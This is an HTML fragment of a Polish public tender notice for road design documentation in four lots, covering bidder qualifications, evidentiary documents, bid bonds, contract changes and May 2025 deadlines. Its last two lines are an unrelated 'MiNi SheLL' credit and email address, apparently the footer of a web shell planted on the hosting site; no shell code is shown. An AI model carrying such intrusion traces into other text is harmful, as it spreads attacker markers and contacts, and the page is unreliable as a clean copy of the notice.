t. j.),<br/>o	dla Części 3 – polegające na realizacji projektów dokumentacji drogowych w trybie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2024 r., poz. 725 t.j.) oraz rozporządzenia Ministra Infrastruktury z dnia 24.06.2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022, poz. 1518) lub projektów dokumentacji drogowych w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2024 r. poz. 311 t. j.),<br/>o	dla Części 4 – polegające na realizacji projektów dokumentacji drogowych w trybie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2024 r., poz. 725 t.j.) oraz rozporządzenia Ministra Infrastruktury z dnia 24.06.2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022, poz. 1518) lub projektów dokumentacji drogowych w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2024 r. poz. 311 t. j.).<br/>b)	dysponują:<br/>o	dla Części 1 – jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: drogowej lub równoważne im uprawnienia wydane według odrębnych przepisów (kierownik grupy projektowej)<br/>oraz <br/>jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: instalacji sanitarnych lub równoważne im uprawnienia wydane według odrębnych przepisów,<br/>oraz<br/>jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: energetycznej lub równoważne im uprawnienia wydane według odrębnych przepisów,<br/>o	dla Części 2 – jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: drogowej lub równoważne im uprawnienia wydane według odrębnych przepisów (kierownik grupy projektowej)<br/>oraz <br/>jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: instalacji sanitarnych lub równoważne im uprawnienia wydane według odrębnych przepisów,<br/>oraz<br/>jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: energetycznej lub równoważne im uprawnienia wydane według odrębnych przepisów,<br/>o	dla Części 3 – jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: drogowej lub równoważne im uprawnienia wydane według odrębnych przepisów (kierownik grupy projektowej)<br/>oraz <br/>jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: instalacji sanitarnych lub równoważne im uprawnienia wydane według odrębnych przepisów,<br/>oraz<br/>jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: energetycznej lub równoważne im uprawnienia wydane według odrębnych przepisów,<br/>o	dla Części 4 – jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: drogowej lub równoważne im uprawnienia wydane według odrębnych przepisów (kierownik grupy projektowej)<br/>oraz <br/>jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: instalacji sanitarnych lub równoważne im uprawnienia wydane według odrębnych przepisów,<br/>oraz<br/>jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: energetycznej lub równoważne im uprawnienia wydane według odrębnych przepisów.<br/>UWAGA<br/>W przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. (art. 117 pzp)<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, <br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy <br/>w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw wykluczenia z postępowania, którego wzór stanowi Załącznik nr 6 i 7 do SWZ. Oświadczenia te składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Informacje zawarte w oświadczeniach, o których mowa w pkt. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału <br/>w postępowaniu.<br/>3. Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4. Zamawiający będzie wymagał od Wykonawcy złożenia następujących podmiotowych środków dowodowych:<br/>1) Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy,<br/>o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2024r. 1616),<br/>z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek <br/>o dopuszczenie do udziału w postepowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału <br/>w postepowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 8 do SWZ.<br/>2) W celu potwierdzania spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca składa:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy stanowiący Załącznik nr 9 do SWZ;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie pracami projektowymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z wzorem stanowiącym Załącznik nr 10 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Na podstawie art. 97 ust. 1 ustawy Zamawiający żąda od Wykonawców wniesienia wadium.<br/>2. Zamawiający wymaga, aby wadium wniesione zostało przed upływem terminu składania ofert w kwocie: <br/>Część 1: 1.000,00 PLN (słownie: jeden tysiąc złotych 00/100 PLN)<br/>Część 2: 600,00 PLN (słownie: sześćset złotych 00/100 PLN)<br/>Część 3: 400,00 PLN (słownie: czterysta złotych 00/100 PLN)<br/>Część 4: 500,00 PLN (słownie: pięćset złotych 00/100 PLN)<br/>i utrzymane zostało nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>3. Wadium wniesione w pieniądzu będzie wniesione skutecznie, jeżeli rachunek bankowy Zamawiającego zostanie uznany kwotą wadium przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert)<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: Nr 35 1020 1332 0000 1102 0280 9606. <br/>5. Wadium może być wniesione w jednej lub kilku następujących formach: <br/> 1) pieniądzu;<br/> 2) gwarancjach bankowych;<br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462, z poźn. zm.).<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 5 ppkt 2) 3) 4), Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej, podpisany kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu.<br/>7. W przypadku wniesienia wadium w innej formie niż w pieniądzu, z treści gwarancji i poręczeń musi wynikać bezwarunkowe, nieodwołalne i na pierwsze żądanie Zamawiającego (beneficjenta) zobowiązanie Gwaranta do zapłaty na rzecz Zamawiającego kwoty wadium w okolicznościach skutkujących zatrzymaniem wadium określonych w art. 98 ust. 6 ustawy.<br/>8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy, zostanie odrzucona <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia o których mowa w rozdziale X pkt. 1 SWZ składa każdy z wykonawców. Oświadczenia te potwierdzają, brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenia, z których wynika, które usługi wykonują poszczególni wykonawcy. Wzór oświadczenia stanowi Załącznik nr 12 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych w projektowanych postanowieniach umowy, które zostaną wprowadzone do umowy w sprawie zamówienia<br/>publicznego stanowiących Załącznik nr 2 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwości zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454 – 455 pzp oraz wskazanym w projektowanych postanowieniach umowy, które zostaną<br/>wprowadzone do umowy w sprawie zamówienia publicznego stanowiących Załącznik nr 2 do SWZ.<br/>4. Zmiana umowy wymaga dla swojej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń:<br/>1) Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu<br/>umowy. <br/>2) Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny<br/>sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej<br/>zapisów przez strony.<br/>3) Wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy zamawiający uzna, że osoby te nie wykonują<br/>należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień<br/>składania ofert warunki określone w specyfikacji, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku<br/>zamawiającego,<br/>4) Zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy a także z np. wystąpienia zwłoki w<br/>wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń,<br/>5) Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami:<br/>a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem,<br/>b) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana numeru rachunku bankowego),<br/>c) zmiany danych teleadresowych,<br/>d) zmiana obowiązującej stawki VAT,<br/>6. W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pkt.5 termin realizacji przedmiotu umowy może<br/>ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie<br/>dłużej jednak niż o okres trwania tych okoliczności.<br/>7. Zamawiający dopuszcza możliwość dokonania zmian w zakresie powierzenia części lub całości wykonania przedmiotu<br/>zamówienia podwykonawcom, poprzez:<br/>1) w przypadku nie przewidzenia podwykonawców w momencie składania oferty, wprowadzenie ich podczas realizacji<br/>zamówienia,<br/>2) rozszerzenie kręgu podwykonawców,<br/>3) zmianę lub wykreślenie podwykonawcy,<br/>4) zmianę zakresu prac powierzonych podwykonawcy,<br/>8. Warunki zmian:<br/>1) inicjowanie zmian – na wniosek wykonawcy lub Zamawiającego,<br/>2) uzasadnienie zmian – prawidłowa realizacja przedmiotu umowy,<br/>3) forma zmian – aneks do umowy w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający nie przewiduje zwrotu kosztów postępowania.<br/>2.	Zamawiający nie wymaga wizji lokalnej.<br/>3.	Dla przedmiotowego postępowania nie ma zastosowania żadna z sytuacji określonych w art. 65 ust 1, art. 66 i art. 69 pzp. W związku z powyższym nie zachodzi konieczność komunikowania się z Wykonawcą w sposób inny niż przewidziany w niniejszej SWZ.<br/>4.	Zamawiający nie przewiduje możliwości udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy.<br/>5.	Przedmiot zamówienia nie wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy, osób wykonujących czynności w zakresie realizacji zamówienia w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974r. Kodeks pracy (Dz. U. z 2020 r. poz 1320).

Creat By MiNi SheLL
Email: jattceo@gmail.com